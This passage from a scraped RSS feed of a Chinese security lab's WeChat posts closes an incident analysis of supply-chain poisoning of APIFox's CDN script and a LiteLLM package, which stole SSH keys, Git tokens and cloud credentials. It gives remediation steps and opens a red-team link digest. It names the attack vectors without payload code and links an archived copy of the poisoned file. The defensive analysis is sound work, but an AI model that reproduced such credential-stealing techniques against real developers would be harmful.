0px;box-sizing: border-box;"><strong style="box-sizing: border-box;"><span leaf="">LiteLLM</span></strong></p></div></div></td><td data-colwidth="21.8100%" width="21.8100%" style="border-width: 1px;border-color: rgb(62, 62, 62) rgb(255, 255, 255) rgb(62, 62, 62) rgb(62, 62, 62);border-style: none;background-color: rgb(69, 109, 100);box-sizing: border-box;padding: 0px;"><div style="margin: 5px 0%;box-sizing: border-box;"><div style="text-align: center;padding: 0px 5px;color: rgb(255, 255, 255);box-sizing: border-box;"><p style="margin: 0px;padding: 0px;box-sizing: border-box;"><strong style="box-sizing: border-box;"><span leaf="">APIFox</span></strong></p></div></div></td></tr><tr style="box-sizing: border-box;"><td data-colwidth="33.0000%" width="33.0000%" style="border-width: 1px;border-color: rgb(62, 62, 62) rgb(62, 62, 62) rgb(223, 223, 223);border-style: none none solid;background-color: rgba(255, 255, 255, 0);padding: 3px;box-sizing: border-box;"><div style="margin: 5px 0%;box-sizing: border-box;"><div style="padding: 0px 5px;box-sizing: border-box;"><p style="text-align: center;white-space: normal;margin: 0px;padding: 0px;box-sizing: border-box;"><span leaf="">攻击载体</span></p></div></div></td><td data-colwidth="45.0000%" width="45.0000%" style="border-width: 1px;border-color: rgb(62, 62, 62) rgb(62, 62, 62) rgb(223, 223, 223);border-style: none none solid;background-color: rgba(255, 255, 255, 0);padding: 3px;box-sizing: border-box;"><div style="text-align: center;box-sizing: border-box;"><p style="margin: 0px;padding: 0px;box-sizing: border-box;"><span leaf="">Python pth 文件</span></p></div></td><td data-colwidth="21.8100%" width="21.8100%" style="border-width: 1px;border-color: rgb(62, 62, 62) rgb(62, 62, 62) rgb(223, 223, 223);border-style: none none solid;background-color: rgba(255, 255, 255, 0);padding: 3px;box-sizing: border-box;"><div style="margin: 5px 0%;box-sizing: border-box;"><div style="text-align: center;padding: 0px 5px;box-sizing: border-box;"><p style="word-break: break-all;margin: 0px;padding: 0px;box-sizing: border-box;"><span leaf="">CDN JavaScript</span></p></div></div></td></tr><tr style="box-sizing: border-box;"><td data-colwidth="33.0000%" width="33.0000%" style="border-width: 1px;border-color: rgb(62, 62, 62) rgb(62, 62, 62) rgb(223, 223, 223);border-style: none none solid;background-color: rgba(255, 255, 255, 0);padding: 3px;box-sizing: border-box;"><div style="margin: 5px 0%;box-sizing: border-box;"><div style="text-align: center;padding: 0px 5px;box-sizing: border-box;"><p style="word-break: break-all;margin: 0px;padding: 0px;box-sizing: border-box;"><span leaf="">触发机制</span></p></div></div></td><td data-colwidth="45.0000%" width="45.0000%" style="border-width: 1px;border-color: rgb(62, 62, 62) rgb(62, 62, 62) rgb(223, 223, 223);border-style: none none solid;background-color: rgba(255, 255, 255, 0);padding: 3px;box-sizing: border-box;"><div style="margin: 5px 0%;box-sizing: border-box;"><div style="text-align: center;padding: 0px 5px;box-sizing: border-box;"><p style="word-break: break-all;margin: 0px;padding: 0px;box-sizing: border-box;"><span leaf="">Python 启动时自动执行</span></p></div></div></td><td data-colwidth="21.8100%" width="21.8100%" style="border-width: 1px;border-color: rgb(62, 62, 62) rgb(62, 62, 62) rgb(223, 223, 223);border-style: none none solid;background-color: rgba(255, 255, 255, 0);padding: 3px;box-sizing: border-box;"><div style="margin: 5px 0%;box-sizing: border-box;"><div style="text-align: center;padding: 0px 5px;box-sizing: border-box;"><p style="word-break: break-all;margin: 0px;padding: 0px;box-sizing: border-box;"><span leaf="">服务端控制</span></p></div></div></td></tr><tr style="box-sizing: border-box;"><td data-colwidth="33.0000%" width="33.0000%" style="border-width: 1px;border-color: rgb(62, 62, 62) rgb(62, 62, 62) rgb(223, 223, 223);border-style: none none solid;background-color: rgba(255, 255, 255, 0);padding: 3px;box-sizing: border-box;"><div style="margin: 5px 0%;box-sizing: border-box;"><div style="text-align: center;padding: 0px 5px;box-sizing: border-box;"><p style="word-break: break-all;margin: 0px;padding: 0px;box-sizing: border-box;"><span leaf="">目标环境</span></p></div></div></td><td data-colwidth="45.0000%" width="45.0000%" style="border-width: 1px;border-color: rgb(62, 62, 62) rgb(62, 62, 62) rgb(223, 223, 223);border-style: none none solid;background-color: rgba(255, 255, 255, 0);padding: 3px;box-sizing: border-box;"><div style="margin: 5px 0%;box-sizing: border-box;"><div style="text-align: center;padding: 0px 5px;box-sizing: border-box;"><p style="word-break: break-all;margin: 0px;padding: 0px;box-sizing: border-box;"><span leaf="">服务器、K8s 集群</span></p></div></div></td><td data-colwidth="21.8100%" width="21.8100%" style="border-width: 1px;border-color: rgb(62, 62, 62) rgb(62, 62, 62) rgb(223, 223, 223);border-style: none none solid;background-color: rgba(255, 255, 255, 0);padding: 3px;box-sizing: border-box;"><div style="margin: 5px 0%;box-sizing: border-box;"><div style="text-align: center;padding: 0px 5px;box-sizing: border-box;"><p style="word-break: break-all;margin: 0px;padding: 0px;box-sizing: border-box;"><span leaf="">开发者本地工作站</span></p></div></div></td></tr><tr style="box-sizing: border-box;"><td data-colwidth="33.0000%" width="33.0000%" style="border-width: 1px;border-color: rgb(62, 62, 62) rgb(62, 62, 62) rgb(223, 223, 223);border-style: none none solid;background-color: rgba(255, 255, 255, 0);padding: 3px;box-sizing: border-box;"><div style="margin: 5px 0%;box-sizing: border-box;"><div style="text-align: center;padding: 0px 5px;box-sizing: border-box;"><p style="word-break: break-all;margin: 0px;padding: 0px;box-sizing: border-box;"><span leaf="">窃取目标</span></p></div></div></td><td data-colwidth="45.0000%" width="45.0000%" style="border-width: 1px;border-color: rgb(62, 62, 62) rgb(62, 62, 62) rgb(223, 223, 223);border-style: none none solid;background-color: rgba(255, 255, 255, 0);padding: 3px;box-sizing: border-box;"><div style="margin: 5px 0%;box-sizing: border-box;"><div style="text-align: center;padding: 0px 5px;box-sizing: border-box;"><p style="word-break: break-all;margin: 0px;padding: 0px;box-sizing: border-box;"><span leaf="">云凭据、K8s secrets</span></p></div></div></td><td data-colwidth="21.8100%" width="21.8100%" style="border-width: 1px;border-color: rgb(62, 62, 62) rgb(62, 62, 62) rgb(223, 223, 223);border-style: none none solid;background-color: rgba(255, 255, 255, 0);padding: 3px;box-sizing: border-box;"><div style="margin: 5px 0%;box-sizing: border-box;"><div style="text-align: center;padding: 0px 5px;box-sizing: border-box;"><p style="word-break: break-all;margin: 0px;padding: 0px;box-sizing: border-box;"><span leaf="">SSH 密钥、Git 凭证</span></p></div></div></td></tr><tr style="box-sizing: border-box;"><td data-colwidth="33.0000%" width="33.0000%" style="border-width: 1px;border-color: rgb(62, 62, 62) rgb(62, 62, 62) rgb(223, 223, 223);border-style: none none solid;background-color: rgba(255, 255, 255, 0);padding: 3px;box-sizing: border-box;"><div style="margin: 5px 0%;box-sizing: border-box;"><div style="text-align: center;padding: 0px 5px;box-sizing: border-box;"><p style="word-break: break-all;margin: 0px;padding: 0px;box-sizing: border-box;"><span leaf="">攻击者</span></p></div></div></td><td data-colwidth="45.0000%" width="45.0000%" style="border-width: 1px;border-color: rgb(62, 62, 62) rgb(62, 62, 62) rgb(223, 223, 223);border-style: none none solid;background-color: rgba(255, 255, 255, 0);padding: 3px;box-sizing: border-box;"><div style="margin: 5px 0%;box-sizing: border-box;"><div style="text-align: center;padding: 0px 5px;box-sizing: border-box;"><p style="word-break: break-all;margin: 0px;padding: 0px;box-sizing: border-box;"><span leaf="">TeamPCP 组织</span></p></div></div></td><td data-colwidth="21.8100%" width="21.8100%" style="border-width: 1px;border-color: rgb(62, 62, 62) rgb(62, 62, 62) rgb(223, 223, 223);border-style: none none solid;background-color: rgba(255, 255, 255, 0);padding: 3px;box-sizing: border-box;"><div style="margin: 5px 0%;box-sizing: border-box;"><div style="text-align: center;padding: 0px 5px;box-sizing: border-box;"><p style="word-break: break-all;margin: 0px;padding: 0px;box-sizing: border-box;"><span leaf="">未知</span></p></div></div></td></tr></tbody></table></p></div><p style="word-break: break-all;white-space: normal;margin: 0px;padding: 0px;box-sizing: border-box;"><span leaf="">LiteLLM 瞄准云基础设施，APIFox 瞄准开发者终端。结合起来，攻击者可获得从开发到生产的完整访问链。供应链投毒的 ROI 远高于针对性攻击，已成为 2026 年威胁 landscape 的显著特征。</span></p><div style="margin: 10px 0%;text-align: left;justify-content: flex-start;display: flex;flex-flow: row;box-sizing: border-box;"><div style="display: inline-block;width: auto;vertical-align: top;border-left: 5px solid rgb(67, 146, 117);border-bottom-left-radius: 0px;padding: 0px 0px 0px 9px;min-width: 10%;max-width: 100%;flex: 0 0 auto;height: auto;align-self: flex-start;box-sizing: border-box;"><div style="margin: 2px 0%;box-sizing: border-box;"><div style="color: rgb(67, 146, 117);line-height: 1.3;text-align: justify;box-sizing: border-box;"><p style="word-break: break-all;white-space: normal;margin: 0px;padding: 0px;box-sizing: border-box;"><strong style="box-sizing: border-box;"><span leaf="">为什么开发者工具成为目标</span></strong></p></div></div></div></div><div style="box-sizing: border-box;"><p style="word-break: break-all;white-space: normal;margin: 0px;padding: 0px;box-sizing: border-box;"><span leaf="">APIFox、Postman、Insomnia 这类 API 测试工具的用户群体具有高价值特征：拥有代码仓库访问权限、可能持有生产环境 SSH 密钥、命令行历史包含敏感信息、使用的工具通常被安全团队放行。</span></p><p style="word-break: break-all;white-space: normal;margin: 0px;padding: 0px;box-sizing: border-box;"><span leaf="">从攻击者视角，这是高价值、低防守的目标。开发者工具很少被纳入传统安全扫描，企业 EDR 策略也相对宽松。</span></p></div><div style="margin: 10px 0%;text-align: left;justify-content: flex-start;display: flex;flex-flow: row;box-sizing: border-box;"><div style="display: inline-block;width: auto;vertical-align: top;border-left: 5px solid rgb(67, 146, 117);border-bottom-left-radius: 0px;padding: 0px 0px 0px 9px;min-width: 10%;max-width: 100%;flex: 0 0 auto;height: auto;align-self: flex-start;box-sizing: border-box;"><div style="margin: 2px 0%;box-sizing: border-box;"><div style="color: rgb(67, 146, 117);line-height: 1.3;text-align: justify;box-sizing: border-box;"><p style="word-break: break-all;white-space: normal;margin: 0px;padding: 0px;box-sizing: border-box;"><strong style="box-sizing: border-box;"><span leaf="">官方响应评估</span></strong></p></div></div></div></div><div style="box-sizing: border-box;"><p style="word-break: break-all;white-space: normal;margin: 0px;padding: 0px;box-sizing: border-box;"><span leaf="">做得好的地方：反应速度较快、修复方案彻底（废除在线动态加载）、提供了安全联系方式。</span></p><p style="word-break: break-all;white-space: normal;margin: 0px;padding: 0px;box-sizing: border-box;"><span leaf="">做得不够的地方：公告发布时间略晚（攻击窗口已结束 3 天）、未说明 CDN 如何被篡改、缺乏技术细节和自查工具。</span></p><p style="word-break: break-all;white-space: normal;margin: 0px;padding: 0px;box-sizing: border-box;"><span leaf="">关键问题：攻击者如何获得 CDN 写入权限？是否通过凭证泄露、CDN 供应商漏洞还是内部人员？其他使用同一 CDN 的服务是否受影响？</span></p></div><div style="margin: 10px 0%;text-align: left;justify-content: flex-start;display: flex;flex-flow: row;box-sizing: border-box;"><div style="display: inline-block;width: auto;vertical-align: top;border-left: 5px solid rgb(67, 146, 117);border-bottom-left-radius: 0px;padding: 0px 0px 0px 9px;min-width: 10%;max-width: 100%;flex: 0 0 auto;height: auto;align-self: flex-start;box-sizing: border-box;"><div style="margin: 2px 0%;box-sizing: border-box;"><div style="color: rgb(67, 146, 117);line-height: 1.3;text-align: justify;box-sizing: border-box;"><p style="word-break: break-all;white-space: normal;margin: 0px;padding: 0px;box-sizing: border-box;"><strong style="box-sizing: border-box;"><span leaf="">给用户的建议</span></strong></p></div></div></div></div><div style="box-sizing: border-box;"><p style="word-break: break-all;white-space: normal;margin: 0px;padding: 0px;box-sizing: border-box;"><span leaf="">在攻击窗口期内使用过 APIFox 公网 SaaS 版的用户应：</span></p><ol style="list-style-type: decimal;box-sizing: border-box;padding-left: 20px;list-style-position: outside;" class="list-paddingleft-1"><li style="box-sizing: border-box;"><p style="word-break: break-all;margin: 0px;padding: 0px;box-sizing: border-box;"><span leaf="">升级到 2.8.19 或更新版本</span></p></li><li style="box-sizing: border-box;"><p style="word-break: break-all;margin: 0px;padding: 0px;box-sizing: border-box;"><span leaf="">轮换所有 SSH 密钥，在服务器上更新 authorized_keys</span></p></li><li style="box-sizing: border-box;"><p style="word-break: break-all;margin: 0px;padding: 0px;box-sizing: border-box;"><span leaf="">吊销并重新生成 Git Token（GitHub/GitLab）</span></p></li><li style="box-sizing: border-box;"><p style="word-break: break-all;margin: 0px;padding: 0px;box-sizing: border-box;"><span leaf="">检查命令行历史，轮换其中暴露的敏感凭证</span></p></li></ol><p style="word-break: break-all;white-space: normal;margin: 0px;padding: 0px;box-sizing: border-box;"><span leaf="">企业安全团队应排查受影响员工范围，评估 SSH 密钥和 Git 凭证泄露的影响面，监控异常 SSH 连接。</span></p></div><div style="margin: 10px 0%;text-align: left;justify-content: flex-start;display: flex;flex-flow: row;box-sizing: border-box;"><div style="display: inline-block;width: auto;vertical-align: top;border-left: 5px solid rgb(67, 146, 117);border-bottom-left-radius: 0px;padding: 0px 0px 0px 9px;min-width: 10%;max-width: 100%;flex: 0 0 auto;height: auto;align-self: flex-start;box-sizing: border-box;"><div style="margin: 2px 0%;box-sizing: border-box;"><div style="color: rgb(67, 146, 117);line-height: 1.3;text-align: justify;box-sizing: border-box;"><p style="word-break: break-all;white-space: normal;margin: 0px;padding: 0px;box-sizing: border-box;"><strong style="box-sizing: border-box;"><span leaf="">开放问题</span></strong></p></div></div></div></div><ul style="list-style-type: disc;box-sizing: border-box;padding-left: 20px;list-style-position: outside;" class="list-paddingleft-2"><li style="box-sizing: border-box;"><p style="word-break: break-all;margin: 0px;padding: 0px;box-sizing: border-box;"><span leaf="">攻击者如何获得 CDN 写入权限？其他服务是否受影响？</span></p></li><li style="box-sizing: border-box;"><p style="word-break: break-all;margin: 0px;padding: 0px;box-sizing: border-box;"><span leaf="">C2 域名为何在公告前下线？攻击者主动撤退还是被投诉封禁？</span></p></li><li style="box-sizing: border-box;"><p style="word-break: break-all;margin: 0px;padding: 0px;box-sizing: border-box;"><span leaf="">高价值目标是否遭受了未捕获的后续攻击（后门植入、横向移动）？</span></p></li><li style="box-sizing: border-box;"><p style="margin: 0px;padding: 0px;box-sizing: border-box;"><span style="background-color: rgb(231, 231, 231);box-sizing: border-box;"><span leaf="">.it.com</span></span><span leaf=""> 这类非标准域名是否会成为供应链攻击的新趋势？</span></p></li><li style="box-sizing: border-box;"><p style="word-break: break-all;margin: 0px;padding: 0px;box-sizing: border-box;"><span leaf="">为什么 Stage-2 代码中保留了完整的中文开发注释？入口混淆层和后端载荷可能不是同一人编写</span></p></li></ul><div style="display: flex;flex-flow: row;margin: 10px 0%;text-align: left;justify-content: flex-start;box-sizing: border-box;"><div style="display: inline-block;vertical-align: bottom;width: auto;align-self: flex-end;min-width: 10%;max-width: 100%;flex: 0 0 auto;height: auto;box-sizing: border-box;"><div style="margin: 10px 0% 0px;box-sizing: border-box;"><div style="font-family: Optima-Regular, PingFangTC-light;color: rgb(67, 146, 117);font-size: 18px;line-height: 1;text-align: justify;box-sizing: border-box;"><p style="word-break: break-all;white-space: normal;margin: 0px;padding: 0px;box-sizing: border-box;"><strong style="box-sizing: border-box;"><span style="box-sizing: border-box;"><span leaf="">参考来源</span></span></strong></p></div></div></div></div><div style="box-sizing: border-box;"><p style="word-break: break-all;white-space: normal;margin: 0px;padding: 0px;box-sizing: border-box;"><span leaf="">[1] 白帽酱の博客：《Apifox 供应链投毒攻击 — 完整技术分析》：<a href="https://rce.moe/2026/03/25/apifox-supply-chain-attack-analysis/" target="_blank">https://rce.moe/2026/03/25/apifox-supply-chain-attack-analysis/</a></span></p><p style="word-break: break-all;white-space: normal;margin: 0px;padding: 0px;box-sizing: border-box;"><span leaf="">[2] APIFox 官方安全公告：<a href="https://docs.apifox.com/8392582m0" target="_blank">https://docs.apifox.com/8392582m0</a></span></p><p style="word-break: break-all;white-space: normal;margin: 0px;padding: 0px;box-sizing: border-box;"><span leaf="">[3] Wayback Machine 存档：投毒版本文件存档：<a href="https://web.archive.org/web/20260305160602/https://cdn.apifox.com/www/assets/js/user-tracking.min.js" target="_blank">https://web.archive.org/web/20260305160602/https://cdn.apifox.com/www/assets/js/user-tracking.min.js</a></span></p></div><div style="margin: 54px 0% 10px;text-align: center;justify-content: center;display: flex;flex-flow: row;box-sizing: border-box;"><div style="display: inline-block;width: 95%;vertical-align: top;border-style: solid;border-width: 2px;border-color: rgb(67, 146, 117);padding: 0px;align-self: flex-start;flex: 0 0 auto;box-sizing: border-box;"><div style="font-size: 11px;margin: -44px 0% 0px;box-sizing: border-box;"><div style="width: 7em;height: 7em;display: inline-block;vertical-align: middle;border-radius: 100%;background-color: rgb(255, 255, 255);margin: 0px -2.18em 0px -2.2em;box-sizing: border-box;"><div data-cacheurl="" data-remoteid="" style="width: 6em;height: 6em;margin: 0.5em auto;border-radius: 100%;background-position: 50.9993% 50%;background-repeat: no-repeat;background-size: 170.274%;border-width: 3px;border-style: solid;border-color: rgb(255, 255, 255);overflow: hidden;box-sizing: border-box;background-image: url(&#34;https://wechat2rss.xlab.app/img-proxy/?k=33835a9c&amp;u=https%3A%2F%2Fmmbiz.qpic.cn%2Fmmbiz_png%2FuZT6kWW1jCk2u4SibBMK5uVt9F8kiaqjcOsfdMpDib610b25BaeVYwXEu2ItgNKp2TV6vXC6woowRvXJ6V8EFBNN003HUGAV8JVKZHySFjiajt0%2F640%3Fwx_fmt%3Dpng%26from%3Dappmsg&#34;);"><p style="width: 100%;height: 100%;overflow: hidden;line-height: 0;max-width: 100%;box-sizing: border-box;" nodeleaf=""><img data-aistatus="1" class="rich_pages wxw-img" data-ratio="0.9722222" data-s="300,640" data-type="png" data-w="1080" style="width: 100%;height: 100%;opacity: 0;box-sizing: border-box;" data-imgfileid="100011159" src="https://wechat2rss.xlab.app/img-proxy/?k=dde36c62&amp;u=https%3A%2F%2Fmmbiz.qpic.cn%2Fmmbiz_png%2FuZT6kWW1jCn6xb2jUGFBXJuwkvZRicAyGCYVibiczY3OkLJibOtotmmiaNtg30UPCf6GNKlf0K6Jx8zLNAUdXgcvlicbTticzXEE7iaKt5ozNhRic5wk%2F640%3Fwx_fmt%3Dpng%26from%3Dappmsg"/></p></div></div></div><div style="justify-content: center;display: flex;flex-flow: row;box-sizing: border-box;"><div style="display: inline-block;width: 100%;vertical-align: top;padding: 10px 10px 20px;align-self: flex-start;flex: 0 0 auto;box-sizing: border-box;"><div style="font-size: 15px;text-align: justify;line-height: 1.8;box-sizing: border-box;"><p style="white-space: normal;margin: 0px;padding: 0px;box-sizing: border-box;"><strong style="box-sizing: border-box;"><span leaf="">绿盟科技天元实验室</span></strong><span leaf="">专注于新型实战化攻防对抗技术研究。</span></p><p style="white-space: normal;margin: 0px;padding: 0px;box-sizing: border-box;"><span leaf="">研究目标包括：漏洞利用技术、防御绕过技术、攻击隐匿技术、攻击持久化技术等蓝军技术，以及攻击技战术、攻击框架的研究。涵盖Web安全、终端安全、AD安全、云安全等多个技术领域的攻击技术研究，以及工业互联网、车联网等业务场景的攻击技术研究。通过研究攻击对抗技术，从攻击视角提供识别风险的方法和手段，为威胁对抗提供决策支撑。</span></p></div></div></div></div></div><div style="display: flex;flex-flow: row;margin: 10px 0%;text-align: left;justify-content: flex-start;box-sizing: border-box;"><div style="display: inline-block;vertical-align: top;width: auto;flex: 20 20 0%;align-self: flex-start;height: auto;box-sizing: border-box;"><div style="margin: -5px 0%;text-align: justify;justify-content: flex-start;display: flex;flex-flow: row;box-sizing: border-box;"><div style="display: inline-block;width: 100%;vertical-align: top;padding: 0px 6px;align-self: flex-start;flex: 0 0 auto;box-sizing: border-box;"><div style="text-align: center;margin: 0px 0%;line-height: 0;box-sizing: border-box;"><p style="max-width: 100%;vertical-align: middle;display: inline-block;line-height: 0;box-sizing: border-box;" nodeleaf=""><img data-aistatus="1" class="rich_pages wxw-img" data-ratio="1" data-s="300,640" data-type="jpeg" data-w="344" style="vertical-align: middle;max-width: 100%;width: 100%;box-sizing: border-box;" data-imgfileid="100011155" src="https://wechat2rss.xlab.app/img-proxy/?k=aad8496f&amp;u=https%3A%2F%2Fmmbiz.qpic.cn%2Fsz_mmbiz_jpg%2FuZT6kWW1jClTMUaUHeKnwDCxmBX3FicfFnsO6Wj1UhjArrbgaVs0xOH7qGtduxQw6bvtzibIfQj4HUMgmAhWHOCb9EquEE0rsHzG89nooCUKQ%2F640%3Fwx_fmt%3Djpeg%26from%3Dappmsg"/></p></div></div></div></div><div style="display: inline-block;vertical-align: top;width: auto;flex: 100 100 0%;align-self: flex-start;height: auto;padding: 0px 0px 0px 20px;box-sizing: border-box;"><div style="color: rgb(67, 146, 117);font-size: 19px;letter-spacing: 2px;box-sizing: border-box;"><p style="margin: 0px;padding: 0px;box-sizing: border-box;"><strong style="box-sizing: border-box;"><span leaf="">M01N Team公众号</span></strong></p></div><div style="margin: 10px 0%;box-sizing: border-box;"><div style="font-size: 13px;color: rgb(160, 160, 160);text-align: justify;line-height: 1.6;letter-spacing: 1px;padding: 0px 3px;box-sizing: border-box;"><p style="white-space: normal;margin: 0px;padding: 0px;box-sizing: border-box;"><span leaf="">聚焦高级攻防对抗热点技术</span></p><p style="white-space: normal;margin: 0px;padding: 0px;box-sizing: border-box;"><span leaf="">绿盟科技蓝军技术研究战队</span></p></div></div></div></div><div style="display: flex;flex-flow: row;margin: 10px 0%;text-align: left;justify-content: flex-start;box-sizing: border-box;"><div style="display: inline-block;vertical-align: top;width: auto;flex: 20 20 0%;align-self: flex-start;height: auto;box-sizing: border-box;"><div style="margin: -5px 0%;text-align: justify;justify-content: flex-start;display: flex;flex-flow: row;box-sizing: border-box;"><div style="display: inline-block;width: 100%;vertical-align: top;padding: 0px 6px;align-self: flex-start;flex: 0 0 auto;box-sizing: border-box;"><div style="text-align: center;margin: 0px 0%;line-height: 0;box-sizing: border-box;"><p style="max-width: 100%;vertical-align: middle;display: inline-block;line-height: 0;box-sizing: border-box;" nodeleaf=""><img data-aistatus="1" class="rich_pages wxw-img" data-ratio="0.9145907" data-s="300,640" data-type="png" data-w="562" style="vertical-align: middle;max-width: 100%;width: 100%;box-sizing: border-box;" data-imgfileid="100011156" src="https://wechat2rss.xlab.app/img-proxy/?k=54e575c2&amp;u=https%3A%2F%2Fmmbiz.qpic.cn%2Fmmbiz_png%2FuZT6kWW1jCne72hBfVbKN3Wwpqt9rQUI1j6Q7XgY5yMPcCah8zpAHJSy5LCclGga9UhkVzT1zyZFaEjlHDCgicXrwjRh6L44WBqia44K0cykc%2F640%3Fwx_fmt%3Dpng%26from%3Dappmsg"/></p></div></div></div></div><div style="display: inline-block;vertical-align: top;width: auto;flex: 100 100 0%;align-self: flex-start;height: auto;padding: 0px 0px 0px 20px;box-sizing: border-box;"><div style="color: rgb(67, 146, 117);font-size: 19px;letter-spacing: 2px;box-sizing: border-box;"><p style="margin: 0px;padding: 0px;box-sizing: border-box;"><strong style="box-sizing: border-box;"><span leaf="">官方攻防交流群</span></strong></p></div><div style="margin: 10px 0%;box-sizing: border-box;"><div style="font-size: 13px;color: rgb(160, 160, 160);text-align: justify;line-height: 1.6;letter-spacing: 1px;padding: 0px 3px;box-sizing: border-box;"><p style="white-space: normal;margin: 0px;padding: 0px;box-sizing: border-box;"><span leaf="">网络安全一手资讯</span></p><p style="white-space: normal;margin: 0px;padding: 0px;box-sizing: border-box;"><span leaf="">攻防技术答疑解惑</span></p><p style="white-space: normal;margin: 0px;padding: 0px;box-sizing: border-box;"><span leaf="">扫码加好友即可拉群</span></p></div></div></div></div></div><p style="display: none;"><mp-style-type data-value="3"></mp-style-type></p>



<p><a href="https://wechat2rss.xlab.app/link-proxy/?k=e55a9984&amp;r=1&amp;u=https%3A%2F%2Fmp.weixin.qq.com%2Fs%3F__biz%3DMzkyMTI0NjA3OA%3D%3D%26mid%3D2247494863%26idx%3D2%26sn%3Ddbaabd7f93aaa9c961bbf753976cc17d">跳转微信打开</a></p>
]]></content:encoded>
      <pubDate>Thu, 26 Mar 2026 18:00:00 +0800</pubDate>
    </item>
    <item>
      <title>每周蓝军技术推送（2026.3.14-2026.3.20）</title>
      <link>https://mp.weixin.qq.com/s?__biz=MzkyMTI0NjA3OA==&amp;mid=2247494762&amp;idx=1&amp;sn=ca8490675064f1b8b18de2a02a4134b5</link>
      <description>关注高级攻防对抗技术热点，研究对手技术进行高级威胁模拟，研判攻击安全发展方向。</description>
      <content:encoded><![CDATA[<p>原创 <span>天元实验室</span> <span>2026-03-20 18:02</span> <span style="display: inline-block;">北京</span></p>






  
  <p><img src="https://wechat2rss.xlab.app/img-proxy/?k=a972b10c&amp;u=https%3A%2F%2Fmmbiz.qpic.cn%2Fmmbiz_jpg%2FTPGibEO8KBwbD5z6C0g2NAp2OicEl3fdbRrPUY2MuWIcreXMC0tGBdfWBviaqDPPyN63iawoWIujD6l1Fx5keMUib4w%2F0%3Fwx_fmt%3Djpeg"/></p>
  <p>关注高级攻防对抗技术热点，研究对手技术进行高级威胁模拟，研判攻击安全发展方向。</p>
  <div style="line-height: 1.6;letter-spacing: 0px;padding-right: 0px;padding-left: 0px;box-sizing: border-box;font-style: normal;font-weight: 400;text-align: justify;font-size: 16px;color: rgb(62, 62, 62);" data-pm-slice="0 0 []"><div style="text-align: center;margin-top: 10px;margin-bottom: 10px;line-height: 0;box-sizing: border-box;"><p style="max-width: 100%;vertical-align: middle;display: inline-block;line-height: 0;width: 100%;height: auto;box-sizing: border-box;" nodeleaf=""><img data-aistatus="1" class="rich_pages wxw-img" data-ratio="0.4222222222222222" data-s="300,640" data-type="png" data-w="900" style="vertical-align: middle;max-width: 100%;width: 100%;box-sizing: border-box;" data-imgfileid="100011111" src="https://wechat2rss.xlab.app/img-proxy/?k=6b5bba06&amp;u=https%3A%2F%2Fmmbiz.qpic.cn%2Fsz_mmbiz_png%2FuZT6kWW1jCl4s640AGL46KI5aAsxHibzH5lxX7v2cNYI0k42X84wSm3Z72Dh9EEO1RXQrd2hHUmFJdR3tAQ5WvPibdPbtLGicAEhyFxRzQmrrI%2F640%3Fwx_fmt%3Dpng%26from%3Dappmsg"/></p></div><div style="text-align: left;justify-content: flex-start;display: flex;flex-flow: row;box-sizing: border-box;"><div style="display: inline-block;width: 100%;vertical-align: top;align-self: flex-start;flex: 0 0 auto;box-sizing: border-box;"><div style="display: flex;flex-flow: row;margin: 12px 0% 10px;text-align: center;justify-content: center;box-sizing: border-box;"><div style="display: inline-block;vertical-align: top;width: auto;min-width: 10%;max-width: 100%;flex: 0 0 auto;height: auto;align-self: flex-start;background-color: rgba(67, 146, 117, 0.14);margin: 3px 0px 0px -20px;box-sizing: border-box;"><div style="margin: 0px 0%;transform: translate3d(4px, 0px, 0px);-webkit-transform: translate3d(4px, 0px, 0px);-moz-transform: translate3d(4px, 0px, 0px);-o-transform: translate3d(4px, 0px, 0px);box-sizing: border-box;"><div style="font-size: 22px;color: rgb(62, 62, 62);padding: 0px 22px;line-height: 2;text-align: justify;box-sizing: border-box;"><p style="white-space: normal;margin: 0px;padding: 0px;box-sizing: border-box;"><strong style="box-sizing: border-box;"><span leaf="">WEB安全</span></strong></p></div></div></div></div></div></div><div style="display: flex;flex-flow: row;text-align: left;justify-content: flex-start;box-sizing: border-box;"><div style="display: inline-block;vertical-align: middle;width: auto;align-self: center;flex: 100 100 0%;box-sizing: border-box;"><div style="color: rgb(62, 62, 62);letter-spacing: 1px;padding: 0px;box-sizing: border-box;"><p style="word-break: break-all;margin: 0px;padding: 0px;box-sizing: border-box;"><span leaf="">Swagger Jacker：审计OpenAPI定义文件的安全问题</span></p></div></div></div><div style="text-align: left;justify-content: flex-start;display: flex;flex-flow: row;width: 100%;border-width: 0px;padding: 0px 0px 0px 14px;letter-spacing: 0px;align-self: flex-start;box-sizing: border-box;"><div style="text-align: justify;justify-content: flex-start;display: flex;flex-flow: row;width: 100%;border-left: 1px solid rgb(67, 146, 117);border-bottom-left-radius: 0px;padding: 6px 0px 20px 13px;letter-spacing: 0px;align-self: flex-start;box-sizing: border-box;"><div style="font-size: 15px;color: rgb(84, 75, 110);letter-spacing: 1.8px;line-height: 1.8;padding: 0px;width: 100%;box-sizing: border-box;"><p style="word-break: break-all;white-space: normal;margin: 0px;padding: 0px;box-sizing: border-box;"><span leaf=""><a href="https://bishopfox.com/blog/swagger-jacker-auditing-openapi-definition-files" target="_blank">https://bishopfox.com/blog/swagger-jacker-auditing-openapi-definition-files</a></span></p></div></div></div><div style="display: flex;flex-flow: row;text-align: left;justify-content: flex-start;box-sizing: border-box;"><div style="display: inline-block;vertical-align: middle;width: auto;align-self: center;flex: 100 100 0%;box-sizing: border-box;"><div style="letter-spacing: 1px;padding: 0px;box-sizing: border-box;"><p style="word-break: break-all;margin: 0px;padding: 0px;box-sizing: border-box;"><span leaf="">使用大语言模型寻找Java反序列化gadget链的研究</span></p></div></div></div><div style="text-align: left;justify-content: flex-start;display: flex;flex-flow: row;width: 100%;border-width: 0px;padding: 0px 0px 0px 14px;letter-spacing: 0px;align-self: flex-start;box-sizing: border-box;"><div style="text-align: justify;justify-content: flex-start;display: flex;flex-flow: row;width: 100%;border-left: 1px solid rgb(67, 146, 117);border-bottom-left-radius: 0px;padding: 6px 0px 20px 13px;letter-spacing: 0px;align-self: flex-start;box-sizing: border-box;"><div style="font-size: 15px;color: rgb(84, 75, 110);letter-spacing: 1.8px;line-height: 1.8;padding: 0px;width: 100%;box-sizing: border-box;"><p style="word-break: break-all;white-space: normal;margin: 0px;padding: 0px;box-sizing: border-box;"><span leaf=""><a href="https://www.atredis.com/blog/2026/3/12/findings-gadgets-like-its-2026" target="_blank">https://www.atredis.com/blog/2026/3/12/findings-gadgets-like-its-2026</a></span></p></div></div></div><div style="text-align: left;justify-content: flex-start;display: flex;flex-flow: row;box-sizing: border-box;"><div style="display: inline-block;width: 100%;vertical-align: top;align-self: 